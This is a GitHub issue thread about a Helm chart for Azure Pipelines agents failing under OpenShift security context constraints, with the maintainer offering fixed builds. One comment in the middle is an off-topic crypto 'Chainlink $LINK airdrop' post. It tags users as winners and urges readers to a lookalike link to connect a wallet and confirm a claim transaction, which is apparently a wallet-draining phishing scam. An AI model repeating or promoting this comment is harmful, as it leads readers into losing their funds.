### ISSUE TITLE
OpenShift SCC compatibility?

### ISSUE THREAD

**Issue by timrburnham** [clemlesne/blue-agent#24]
Is this chart compatible with OpenShift with SCC restrictions? It seems to not like user 0.

```bash
$ helm install clem-ado clemlesne-azure-pipelines-agent/azure-pipelines-agent -n sandbox -f values.yaml
Error: INSTALLATION FAILED: 1 error occurred:
        * pods "clem-ado-azure-pipelines-agent-1" is forbidden: unable to validate against any security context constraint: [provider "anyuid": Forbidden: not usable by user or serviceaccount, provider "pipelines-scc": Forbidden: not usable by user or serviceaccount, spec.volumes[0]: Invalid value: "ephemeral": ephemeral volumes are not allowed to be used, spec.volumes[1]: Invalid value: "ephemeral": ephemeral volumes are not allowed to be used, spec.containers[0].securityContext.runAsUser: Invalid value: 0: must be in the ranges: [1000920000, 1000929999], provider "nonroot": Forbidden: not usable by user or serviceaccount, provider "noobaa": Forbidden: not usable by user or serviceaccount, provider "noobaa-endpoint": Forbidden: not usable by user or serviceaccount, provider "hostmount-anyuid": Forbidden: not usable by user or serviceaccount, provider "elasticsearch-scc": Forbidden: not usable by user or serviceaccount, provider "log-collector-scc": Forbidden: not usable by user or serviceaccount, provider "machine-api-termination-handler": Forbidden: not usable by user or serviceaccount, provider "nginx-ingress-permissions": Forbidden: not usable by user or serviceaccount, provider "k10-prometheus-server": Forbidden: not usable by user or serviceaccount, provider "k10-grafana": Forbidden: not usable by user or serviceaccount, provider "hostnetwork": Forbidden: not usable by user or serviceaccount, provider "hostaccess": Forbidden: not usable by user or serviceaccount, provider "rook-ceph": Forbidden: not usable by user or serviceaccount, provider "node-exporter": Forbidden: not usable by user or serviceaccount, provider "rook-ceph-csi": Forbidden: not usable by user or serviceaccount, provider "privileged": Forbidden: not usable by user or serviceaccount]
```

**Comment by clemlesne** [comment]
Hello @timrburnham,

I see your errors are:

- `spec.volumes[0]: Invalid value: "ephemeral": ephemeral volumes are not allowed to be used`
- `spec.containers[0].securityContext.runAsUser: Invalid value: 0: must be in the ranges: [1000920000, 1000929999]`

**Regarding `spec.volumes[0]: Invalid value: "ephemeral": ephemeral volumes are not allowed to be used`:**

It appears that our Pod Admission Controller disallow you the usage of ephemeral disks. Can you confirm that?

**Regarding `spec.containers[0].securityContext.runAsUser: Invalid value: 0: must be in the ranges: [1000920000, 1000929999]`:**

OpenShift is really strict in terms of privilege escalations, Red Hat is right. I just published a build which fixes this security issue. Can you try the version `5.4.0` (Helm chart + containers)?

**Comment by clemlesne** [comment]
Can you test the image flavor `ubi9` version `6.2.1-1.2d3ceab` on your OpenShift cluster?

Details:

- Build ref https://github.com/clemlesne/azure-pipelines-agent/actions/runs/6962257636/job/18945604971.
- Comit ref 2d3ceabc4fa983ae181646926935993d7c8adc72

**Comment by pgonzalezgebo** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @awcook97, @MahmoudHassan, @alamehmazen123, @rnapoli, @ryuichi24, @sziszka88, @Dkfifiif8

**Comment by clemlesne** [comment]
I'm clothing this issue as there is no update. Don't hesitate to reopen and comment.
